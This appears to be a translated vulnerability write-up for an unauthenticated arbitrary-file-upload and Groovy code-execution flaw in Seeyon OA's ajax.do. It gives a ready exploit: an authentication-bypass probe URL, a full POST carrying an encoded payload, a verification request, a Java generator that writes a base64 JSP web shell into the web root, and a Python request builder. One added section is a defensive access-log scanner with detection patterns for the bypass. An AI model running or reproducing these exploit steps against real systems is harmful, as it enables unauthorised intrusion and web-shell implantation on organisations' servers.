
Seeyon OA: arbitrary file upload via ajax.do

1. Vulnerability overview

Seeyon OA is an office-automation (OA) suite developed and sold by Seeyon. The company was founded as UFIDA Seeyon, renamed Seeyon Xiechuang (致远协创) in 2010 and Seeyon Internet (致远互联) in 2017. Beijing Seeyon Internet Software Co., Ltd. was established in March 2002, is headquartered in Beijing, and designs, develops, sells and supports collaborative office products. Its ajax.do controller has an arbitrary file upload vulnerability: the controller can be reached without a session through a path-normalisation bypass, and the formulaManager.validate method evaluates the submitted formula expression as Groovy, so an unauthenticated attacker can write files such as a JSP web shell under the web root.

2. Affected versions

  • Seeyon OA A6-V5
  • Seeyon OA A8-V5

3. Asset discovery

  • Hunter: app.name="致远 OA"
  • Fingerprint: screenshot in the original post

4. Reproduction

Send the following request to check whether a target is likely vulnerable. The ..;/ segment is what matters: the authentication filter sees a URI ending in a static .css resource and lets it through, while Tomcat strips the ; path parameter and normalises the .. segment, so the request is actually dispatched to ajax.do. A 200 response (rather than a redirect to the login page) indicates the bypass works:

/seeyon/thirdpartyController.do.css/..;/ajax.do

The POST below carries the gzip-compressed, URL-encoded arguments value produced by the generator script at the end of this page. No session cookie is needed:

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1130

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uQ%C3%81N%C3%830%0C%3D%C3%83WX%C2%BD%C2%B4%15%23%1D%08%21%C3%84%C3%94%03%C2%83%21N%08%C2%B4%C2%B1%09%10%C2%87%C2%ACuYP%C3%9BD%C2%8D%C3%8B%3AU%C3%BB%C3%B7%C2%A5K%C2%A1%C2%95%18%C2%B9%3C%C3%BB%C3%85%7E%7E%C2%89%C3%9Fk7%C2%91EV%C2%A6%7C%C2%B6Q%C3%A8%5E%C3%83%C3%99%00%7E%C2%98G%C2%9E5%C2%8CK%C2%A8%C3%89%C3%AD%C3%A8I%C2%A5%0A%C3%94Z%C3%88%C2%BC%C2%B9%C2%9CR%21%C3%B2OP%C2%9CV%10%C2%82%C3%83X%C2%B0%C3%86%25WJ%07%1Aq%23%C3%B3%C3%80%19%1D%C2%83%3DG_%C3%BC%C2%9B3%21%C3%99%C2%93i%C2%A1E%21%08%0BP%5D%7Cn%04r%5C%C3%83%C2%812%C2%AF%C3%91%3Fq%C3%A22S%C2%8C*r%C3%BC_Qh%0D%C3%A8%15%C2%A6i%C3%A3%C3%A0%C3%ADaN%C3%91%C3%AD%C2%90%C2%96%C2%8B%C3%B9%C3%B0%C3%B59%0C%C2%BB%C3%B9%C2%A0%C3%8B%C2%9CeBGl%7C3%C2%9D%5C%5E%C3%9Ca%24cc%21n%C3%91N%3F%5C%C3%A4%C3%BD%C2%9Dh%C3%9B%C3%9A%C3%84%C3%B6%C3%9A%C3%84k%05%C2%99%C3%85q%C2%99%24F%60o%C3%90%1F8%2F%C2%B3%C3%BB%C3%93%C2%AB%C3%BE%03%C3%BA%3F%C3%80%C3%B6I%C2%9A%7B%7D%C3%B1%C3%BFj%C2%A3Tj4%C3%86%C2%B6%C2%A3fC%26%C2%881%01M%C2%9CD%04UUy%7E%C3%ADn%C3%8D%C3%9A%C3%8C%C3%AA%C3%AA%06%C2%A9%28%C3%91%C3%BD%C3%98%01E%C3%BB%16h%C3%B1%01%00%00

If the expression was evaluated, fetch the file the payload wrote to confirm execution (dump.txt in this run):

GET /seeyon/dump.txt HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
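From the defender's side, the three requests above leave two distinctive traces in the web-server access log: a ..;/ segment (often behind a .do.css/ suffix) that carries the request past the login filter, and managerName=formulaManager arriving at ajax.do. The following Python is an added example (not part of the original write-up) that scans combined-format access log lines for both. The log lines are constructed for the example; the first three mirror the probe, exploit and verification requests shown above, the last two are ordinary traffic, including a formulaManager call made from a normal session without the bypass segment.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Tomcat combined log format (not from a real system).
SAMPLE_LOG = """\
10.0.0.5 - - [26/Sep/2024:16:45:58 +0800] "GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1" 200 1024 "-" "Opera/9.80"
10.0.0.5 - - [26/Sep/2024:16:46:35 +0800] "POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1" 200 87 "-" "Opera/9.80"
10.0.0.5 - - [26/Sep/2024:16:46:58 +0800] "GET /seeyon/dump.txt HTTP/1.1" 200 15 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Sep/2024:16:47:01 +0800] "GET /seeyon/main.do HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Sep/2024:16:47:02 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=formulaManager HTTP/1.1" 200 52 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A .do controller path with a static-file suffix glued on, e.g. "thirdpartyController.do.css/"
SUFFIX_RE = re.compile(r"\.do\.[A-Za-z0-9]+/")


def normalise_target(target):
    """Percent-decode repeatedly so "%2e%2e;" and "%252e%252e;" compare equal to "..;"."""
    prev, cur = None, target
    for _ in range(5):           # bounded: each pass either shortens the string or stops
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def classify(target):
    """Return (severity, reasons) for one request target, or None if nothing is suspicious."""
    path, _, query = normalise_target(target).partition("?")
    bypass, reasons = False, []
    if "..;" in path:
        bypass = True
        reasons.append("'..;' segment in path (Tomcat drops the ';' path parameter, then normalises '..')")
    if SUFFIX_RE.search(path):
        bypass = True
        reasons.append("static-resource suffix appended to a .do path")
    if path.endswith("/ajax.do") and "managerName=formulaManager" in query:
        reasons.append("formulaManager reached through ajax.do")
    if not reasons:
        return None
    # A direct formulaManager call from a logged-in session is normal application traffic,
    # so without a bypass segment it is only queued for review.
    return ("high" if bypass else "review", reasons)


def scan(log_text):
    """Run classify() over every parseable line and collect the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify(m["target"])
        if result:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "status": m["status"], "severity": result[0], "reasons": result[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["method"], "; ".join(f["reasons"]))
```

A 200 on a bypassed path is the strongest signal: on a patched or correctly filtered host the probe should redirect to the login page. The follow-up GET for the dropped file is not flagged on its own, because the scanner cannot know which paths are new; correlating unusual static-file requests from the same IP shortly after a high finding is the natural next step.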


Shell generation script

The script below builds the arguments value: a JSON list [Formula, "", {}, true], gzip-compressed with the application's own ZipUtil and then URL-encoded. It needs the Seeyon jars (seeyon-ctp-common and its dependencies) on the classpath.

package com.example.Test;

import com.seeyon.ctp.common.log.CtpLogFactory;
import com.seeyon.ctp.common.po.formula.Formula;
import com.seeyon.ctp.util.ZipUtil;
import com.seeyon.ctp.util.json.JSONUtil;
import org.apache.commons.logging.Log;

import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.HashMap;

// Builds the "arguments" value for formulaManager.validate:
// JSON list [Formula, "", {}, true] -> gzip -> URL-encoding.
public class Test {
    private static final Log LOGGER = CtpLogFactory.getLog(Test.class);

    public static void main(String[] args) throws Exception {
        final Formula formula = new Formula();
        // Server-side check in validate():
        //   if (formula.getFormulaType() != FormulaType.GroovyFunction.getKey() && formula.getFormulaType() != FormulaType.Variable.getKey()) {
        // type 2 passes it, so the expression is handed to the Groovy evaluator.
        formula.setFormulaType(2);
        formula.setFormulaName("test");

        // The expression is evaluated inside a generated Groovy function named after the formula.
        // The payload writes the base64-decoded JSP into the ROOT webapp (Tomcat is normally started
        // from its bin/ directory, hence ../webapps), closes that function with "};", calls it with
        // "test();", and opens a dummy function "def static xxx(){" so that the server's own
        // trailing "}" still parses.
        String payload = "" +
                "def filePath = \"../webapps/ROOT/mzr2.j"+"sp\";" +
                "java.io.File file = new java.io.File(filePath);" +
                // base64 of the JSP web shell (elided in the source page)
                "String shell=\"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\";"+
                "sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();" +
                "String decodeString = new String(decoder.decodeBuffer(shell),\"UTF-8\");"+
                "file << decodeString;};" +
                "test();" +
                "def static xxx(){";
        formula.setFormulaExpression(payload);

        // Argument list in the shape validate() expects: [formula, "", {}, true]
        final ArrayList<Object> list = new ArrayList<>();
        list.add(formula);
        list.add("");
        list.add(new HashMap<>());
        list.add(true);
        final String json = JSONUtil.toJSONString(list);

        // requestCompress=gzip in the query string makes the server gunzip "arguments" first.
        // Using the application's own ZipUtil guarantees the encoding matches what it decodes.
        String strArgs = ZipUtil.compressResponse(json, "gzip", "UTF-8", LOGGER);

        // Percent-encode for the form body. Bytes >= 0x80 come out as two-byte UTF-8 sequences
        // (%C2.., %C3..), which is exactly what the captured request above shows.
        System.out.println(URLEncoder.encode(strArgs, "UTF-8"));
    }
}
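The same encoding in Python, added here as an example (it is neither the page's nor Seeyon's code), with a decoder for reading captured requests. It assumes the server reads the three Formula fields the Java script sets (formulaType, formulaName, formulaExpression), that the gzip bytes are percent-encoded as a one-char-per-byte string (which is what the %C2/%C3 pairs in the captured request indicate), and that Tomcat runs from its bin/ directory, as the Java payload's ../webapps path does. The expression it builds keeps the same function-escape structure as the Java payload but writes a plain-text marker rather than a JSP, so a lab test can be verified with the GET above without leaving an executable file behind.

```python
import gzip
import json
from urllib.parse import quote_plus, unquote_plus


def build_formula_list(expression, name="test", formula_type=2):
    """Argument list for formulaManager.validate: [Formula, "", {}, true].
    Assumption: these three fields are the ones the server reads; the Java
    generator serialises the whole Formula POJO."""
    formula = {"formulaType": formula_type, "formulaName": name, "formulaExpression": expression}
    return [formula, "", {}, True]


def encode_arguments(obj):
    """JSON -> gzip -> one-char-per-byte string -> percent-encoding, mirroring the Java tool."""
    raw = json.dumps(obj, separators=(",", ":")).encode("utf-8")
    gz = gzip.compress(raw, mtime=0)
    latin1 = gz.decode("latin-1")          # each gzip byte becomes one char U+0000..U+00FF
    # Java's URLEncoder: space -> '+', '*' '-' '.' '_' kept, everything else (including '~')
    # encoded as UTF-8 bytes, so 0x8B turns into %C2%8B exactly as in the captured request.
    return quote_plus(latin1, safe="*").replace("~", "%7E")


def decode_arguments(encoded):
    """Reverse of encode_arguments; raises if the percent-encoding is not valid UTF-8."""
    text = unquote_plus(encoded, encoding="utf-8", errors="strict")
    gz = text.encode("latin-1")
    return json.loads(gzip.decompress(gz).decode("utf-8"))


# Same escape structure as the Java payload: the server wraps the expression in a Groovy
# function named after the formula, so "};" closes it, "test();" calls it and
# "def static xxx(){" absorbs the server's trailing brace. Writes a text marker, not a JSP.
# Path assumption: Tomcat's working directory is its bin/ directory.
MARKER_EXPRESSION = (
    'def f = new java.io.File("../webapps/seeyon/dump.txt");'
    'f << "seeyon-formula-probe";};'
    'test();'
    'def static xxx(){'
)


def build_post_request(host, encoded_args, path="/seeyon/autoinstall.do.css/..;/ajax.do"):
    """Raw HTTP/1.1 request text matching the capture above, with Content-Length computed."""
    body = "managerMethod=validate&arguments=" + encoded_args
    head = [
        f"POST {path}?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1",
        f"Host: {host}",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode('ascii'))}",
    ]
    return "\r\n".join(head) + "\r\n\r\n" + body


if __name__ == "__main__":
    args = encode_arguments(build_formula_list(MARKER_EXPRESSION))
    print(build_post_request("target.example", args))
```

To read the arguments value from a captured request, pass the percent-encoded string after "arguments=" to decode_arguments; the first element of the returned list is the Formula object and its formulaExpression is the Groovy that was evaluated.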

Original: https://www.yuque.com/xiaokp7/ocvun2/gvht324hniqpw0l7